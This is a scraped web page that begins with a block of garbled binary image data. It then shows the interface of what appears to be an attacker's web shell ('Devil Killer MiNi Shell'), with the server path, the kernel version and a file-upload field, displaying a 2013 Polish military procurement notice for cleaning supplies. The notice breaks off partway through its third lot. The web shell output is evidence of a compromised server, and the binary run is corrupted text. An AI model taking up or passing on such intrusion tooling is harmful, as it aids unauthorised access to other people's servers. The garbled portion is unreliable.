JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130524/202756-N-2013.html

<p class="kh_header"><b>Warszawa: DOSTAWA ŚRODKÓW CZYSTOŚCI DLA JEDNOSTKI WOJSKOWEJ NR 6021 ORAZ JEDNOSTEK ORGANIZACYJNYCH BĘDĄCYCH NA JEJ ZAOPATRZENIU.
Nr sprawy 24/2013/PN/M/Ż/WI</b><br>
<b>Numer ogłoszenia: 202756 - 2013; data zamieszczenia: 24.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 6021 , ul. Żwirki i Wigury 9/13, 00-909 Warszawa, woj. mazowieckie, tel. 22 684 75 81, faks 22 684 75 77.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ozgst.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa/Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ŚRODKÓW CZYSTOŚCI DLA JEDNOSTKI WOJSKOWEJ NR 6021 ORAZ JEDNOSTEK ORGANIZACYJNYCH BĘDĄCYCH NA JEJ ZAOPATRZENIU.
Nr sprawy 24/2013/PN/M/Ż/WI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamowienia jest dostawa środków czystości dla Jednostki Wojskowej nr 6021 oraz jednostek organizacyjnych będących na jej zaopatrzeniu  z podziałem na  trzy części:
Część nr 1 - Dostawa środków czystości i środków do konserwacji obuwia dla służby mundurowej Jednostki Wojskowej 6021,
Część nr 2 - Dostawa środków czystości dla służby żywnościowej Jednostki Wojskowej 6021,
Część nr 3 - Dostawa środków czystości dla Wydziału Infrastruktury OZGSt. Jednostki Wojskowej 6021,
2. Szczegółowy opis przedmiotu zamówienia przedstawiono w załącznikach  Nr 1a, 1b oraz 1c do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.10.00-6, 39.22.40.00-8, 39.52.58.00-6, 33.76.30.00-6, 33.74.11.00-7, 33.74.10.00-6, 33.71.19.00-6, 33.77.20.00-2, 18.93.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY uzna, że warunek został spełniony, jeżeli WYKONAWCA posiada      środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż łącznie 201 000,00 zł, w tym: 
na zadanie nr 1 - 150 000,00 zł
na zadanie nr 2 -   39 000, 00 zł
na zadanie nr 3 -  12 000,00 zł

UWAGA: 
Jeżeli Wykonawca składa ofertę na kilka części jednocześnie, na potwierdzenie spełnienia
niniejszego warunku, winien wykazać wartość posiadanych środków finansowych lub zdolności
kredytowej dla ich zsumowanej wartości.
W przypadku wartości posiadanych środków finansowych wyrażonych w innej walucie,
Zamawiający, w celu oceny spełnienia ww. warunku, dokona przeliczenia tych wartości wg. kursu
z dnia otwarcia ofert na podstawie Tabeli kursów średnich NBP publikowanych na stronie internetowej: http://www.nbp.pl/home.aspx?c=/ascx/archa.ascx
Uwaga: W przypadku kiedy Wykonawca składa ofertę na kilka części winien wykazać wysokość środków finansowych lub zdolność kredytową dla ich zsumowanej wartości.
Jeżeli Wykonawca, wykazując spełnianie warunków dotyczących zdolności finansowych polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy PZP zobowiązany jest oprócz dokumentów potwierdzających  wysokość posiadanych środków finansowych lub zdolność kredytową WYKONAWCY udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego w SIWZ  wraz z ofertą należy przedłożyć: 
1) aktualne pozwolenie Ministra Zdrowia na  obrót produktami biobójczymi
  na terytorium Rzeczypospolitej Polskiej wydane na podstawie  Ustawy  z dnia 13 września 2002r. o produktach biobójczych (tekst jednolity: Dz. U.  z 2007r. Nr 39 poz. 252 z późn zm.) - dotyczy poz. nr 8 części nr 2 zamówienia. 
2)karty charakterystyki dla produktów wyszczególnionych w załączniku nr 1a - dotyczy części nr 1 zamówienia.
2. WYKONAWCA zobowiązuje się do dostarczenia wraz z dostawą przedmiotu zamówienia:
kart charakterystyki produktu dla pozycji wyszczególnionych w Załączniku nr 1b oraz 1c do SIWZ - Opis przedmiotu zamówienia - dotyczy części nr 2 oraz 3 zamówienia;
zaświadczenia niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym (np. atest higieniczny PZH lub inny) - dotyczy części 
nr 3 zamówienia;</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W zakresie potwierdzenia okoliczności, o których mowa w Rozdziale V ust. 3 SIWZ - należy przedłożyć pisemne oświadczenie zawierające zobowiązanie wskazanych podmiotów do oddania WYKONAWCY do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Treść zobowiązania powinna określać: kto jest podmiotem przyjmującym zasoby, zakres zobowiązania podmiotu trzeciego, czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie ono wykonane, w tym jakiego okresu dotyczy. W sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia.
2. Jeżeli WYKONAWCA ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 2 pkt 2) składa on dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym WYKONAWCA ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym WYKONAWCA ma siedzibę lub miejsce zamieszkania.
W przypadku wątpliwości, co do treści dokumentu złożonego przez WYKONAWCĘ mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, ZAMAWIAJĄCY może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym WYKONAWCA ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
3. W przypadku WYKONAWCÓW ubiegających się wspólnie o zamówienie publiczne zastosowanie ma art. 23 ustawy Pzp.
1)WYKONAWCY wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy (lider konsorcjum). Pełnomocnictwo należy dołączyć do oferty. 
2)W związku z faktem, iż wszelka korespondencja związana z postępowaniem będzie kierowana do ustanowionego przez WYKONAWCÓW pełnomocnika należy podać adres pełnomocnika (lidera konsorcjum), na jaki ma być wysyłana korespondencja.
3)Pełnomocnictwo dla ustanowionego pełnomocnika (lidera konsorcjum) powinno jednoznacznie wskazywać pełnomocnika, określać zakres pełnomocnictwa oraz termin jego ważności a także precyzować postępowanie, do którego się odnosi. Musi też wskazywać wszystkich WYKONAWCÓW wspólnie ubiegających się o zamówienie i być podpisane przez każdego z nich.
4)W przypadku WYKONAWCÓW wspólnie ubiegających się o udzielenie zamówienia 
dokumenty, o których mowa w ust. 1 pkt 2) Rozdział VI SIWZ  - może złożyć jeden 
z WYKONAWCÓW wspólnie ubiegających się o udzielenie  zamówienia; oświadczenie o spełnieniu warunków dotyczących udziału w postępowaniu WYKONAWCY (załącznik Nr 3 do SIWZ),  oświadczenie o braku podstaw do wykluczenia z postępowania (załącznik nr 4 do SIWZ) oraz listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, albo informacje o tym, że WYKONAWCA nie należy do grupy kapitałowej (załącznik Nr 4 do SIWZ) - składa każdy uczestnik Konsorcjum. Każdy uczestnik Konsorcjum składa aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert oraz dokumenty wymienione w ust. 2 pkt 3) i 4) Rozdział VI SIWZ , wystawione nie wcześniej niż  3 miesiące przed upływem terminu składania ofert.
5)Jeżeli oferta WYKONAWCÓW wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, ZAMAWIAJĄCY może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych WYKONAWCÓW. 
4. Oferta składana przez Spółki cywilne, ustawowo zdefiniowane w art. 860 oraz w art. 864 Kodeksu cywilnego (Dz. U. z 1964 r. Nr 16, poz. 93 ze zm.) zgodnie z art. 4 ust. 2 ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej (Dz. U. z 2004 r. Nr 173, poz. 1807 ze zm.) jest traktowana, jako oferta WYKONAWCÓW wspólnie ubiegających się o udzielenie zamówienia publicznego (art. 23 ustawy Pzp) i solidarnie za nie odpowiadających.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ozgst.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, ul. Żwirki i Wigury 9/13, Warszawa, budynek nr 511 pok 3 (od poniedziałku do piątku w godzinach od 8:00 do 15:00).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2013 godzina 11:00, miejsce: Siedziba Zamawiającego, ul. Żwirki i Wigury 9/13, Warszawa, budynek nr 21 Kancelaria Jednostki Wojskowej nr 6021 (od poniedziałku do piątku, w godzinach od 8:00 do 10:00 oraz od 12:00 do 14:00).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa środków czystości i środków do konserwacji obuwia dla służby mundurowej Jednostki Wojskowej 6021.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czystości i środków do konserwacji obuwia dla służby mundurowej Jednostki Wojskowej 6021, w ilościach:
1.	Pasta do obuwia czarna w op. 50 ml - 500 kg,
2.	Pasta do obuwia  z lanoliną czarna  w op. 40 ml  - 155 kg,
3.	Mydło toaletowe w op. 100g	- 5 000 kg,
4.	Krem do rąk  w op. 75 ml - 21 000 szt,
5.	Środek do mycia rąk w op. 500g - 4 500 kg,
6.	Proszek do prania tkanin białych w op. 5 kg - 250 kg,
7.	Proszek do prania tkanin kolorowych w op. 5 kg - 300 kg,
8.	Płynny środek do prania tkanin kolorowych w op. 1 l - 70 l,
9.	Płynny środek do prania tkanin białych w op. 1 l	 - 30 l,
10.	Płyn do płukania tkanin-koncentrat w op. 2 l - 150 l,
11.	Odplamiacz bezchlorowy do tkanin w op. 2 l - 100 l,
Szczegółowy opis przedmiotu zamówienia określono w załączniku nr 1a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.10.00-6, 33.74.10.00-6, 33.71.19.00-6, 33.74.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa środków czystości dla służby żywnościowej Jednostki Wojskowej 6021.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czystości dla służby żywnościowej Jednostki Wojskowej 6021, w ilościach:
1.Proszek do czyszczenia naczyń kuchennych (w op. 0,5 lub 1 kg.) - 40 kg,
2.Produkt do mycia i konserwacji powierzchni ze stali nierdzewnej (w op. 05 lub 1 l.) - 50 l,
3.Płyn (koncentrat) do mycia ręcznego naczyń (w op. 0,5 lub 1 l.) - 1700 l,
4.Płyn do maszynowego mycia naczyń w zmywarkach gastronomicznych  ( op. 5 lub10 l.) - 700 l,
5.Żel do usuwania kamienia  i rdzy (op. 0,5 lub 1 l.) - 100 l,
6.Płyn do mycia i dezynfekcji powierzchni produkcyjnych (op. kanister 5 l.)	 - 300 l,
7.Mleczko do czyszczenia (op. 0,5 lub 1 l.) - 100 l,
8.Płyn do dezynfekcji rąk  (op.0,5 l. lub 1 l.) - 100 l,
9.Gąbka celulozowa kuchenna z fibrą  (5 szt. w op.) - 400 op,
10.Druciak kuchenny plastikowy  (3 szt. w op.) - 250 op,
11.Worki foliowe na odpady 120 l. (10 szt. w rolce.) - 500 rolek,
12.Rękawice  lateksowe  (500 szt. w op.) - 400 op,
13.Ścierka uniwersalna do naczyń 36 x 50 cm. (10 szt. w op.) - 500 op,
14.Szczoteczka prostokątna do mycia, szorowania naczyń z rączką(dł. 15-20 cm.) - 70 szt,
15.Papier pakowy biały (120 x 80 cm) - 250 kg,
16.Folia aluminiowa do pieczenia w rolce 20m. - 100 rolek,
17.Folia do żywności w rolce 20m. - 100 rolek,
18.Woreczki foliowe HDPE 14 x 17 cm  (1000 szt. w op.) - 200 op,
19.Reklamówki jednorazowe z folii HDPE (200 szt. w op.) - 150 op,
20.Rękawice jednorazowe foliowe HD (100 szt. w op.) - 200 op,
21.Serwetki gastronomiczne białe (500 szt. w op.) - 1000 op,
22.Serwetki świąteczne Boże Narodzenie/ Wielkanoc (20 szt. w op.) - 80 op,
23.Serwetki gastronomiczne żółte ( 400 szt. w op.) - 400 op,
24.Ręczniki papierowe zielone (200 szt. w op.) - 500 op,
25.Preparat do usuwania przypaleń i tłuszczu (op. 05 lub 1l.) - 200 l,
26.Rękaw  do pieczenia  5m (1 szt. w op.) - 50 op,
27.Sól do zmywarki w tabletkach  (25 kg w op.)	 - 300 kg,
28.Płyn do nabłyszczania naczyń  (w poj. po 5 l.) - 200 l,
29.Woreczki do zamrażania żywności  (w op. 100 szt.)	 - 500 op,
30.Odkamieniacz  (op.5 l.) - 200 l,
Szczegółowy opis przedmiotu zamówienia określono w załączniku nr 1b do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.22.40.00-8, 39.52.58.00-6, 33.76.30.00-6, 18.93.00.00-7, 33.77.20.02-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa środków czystości dla Wydziału Infrastruktury OZGSt. Jednostki Wojskowej 6021.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czystości dla Wydziału Infrastruktury OZGSt. Jednostki Wojskowej 6021, w ilościach: 
